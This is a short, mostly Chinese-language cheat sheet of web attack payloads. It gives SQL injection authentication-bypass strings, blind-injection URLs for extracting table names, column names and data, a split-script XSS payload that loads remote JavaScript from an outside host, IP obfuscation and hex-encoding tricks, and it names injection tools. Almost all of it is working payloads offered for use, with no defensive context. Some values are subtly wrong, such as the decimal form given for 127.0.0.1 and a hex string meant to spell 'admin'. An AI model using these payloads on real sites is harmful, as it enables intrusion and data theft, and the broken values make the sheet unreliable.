null

' or 1=1--
" or 1=1--
or 1=1--


' or 'a'='a
" or "a"="a
') or ('a'='a
") or ("a"="a


在ASP下的工具有NBSI,啊D,明小子的Domain
在PHP下有工具有PHP-Mysql注射分析器,CASI,HDSI


猜解表名:
http://www.xxx.com/xx.asp?id=x and exists(select * from 表名)
猜解列名:
http://www.xxx.com/xx.asp?id=x and exists(select 列名 from 表名)
猜解列的长度:
http://www.xxx.com/xx.asp?id=x and (select top 1 len(列名) from 表名)>1、>2、>3。。。
猜解列：
http://www.xxx.com/xx.asp?id=x and (select top 1 asc(mid(adminname,1,1)) from config)>50


MSSQL:
http://www.xxx.com/xxx.asp?id=x and user>0就可以得到当前用户的用户名了


xss突破长度限制：
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>


像127.0.0.1这样的ip还可以变作2130706443、0x7f.0x00.0x00.0x01、0177.0000.0000.0001等。


$_GET $_POST $_REQUEST




select * from members where username=char(97,100,109,105,110);
select * from members where username=0x616463696e


ASP、PHP等脚本语言都是属于解释性语言，而JSP是属于编译性语言。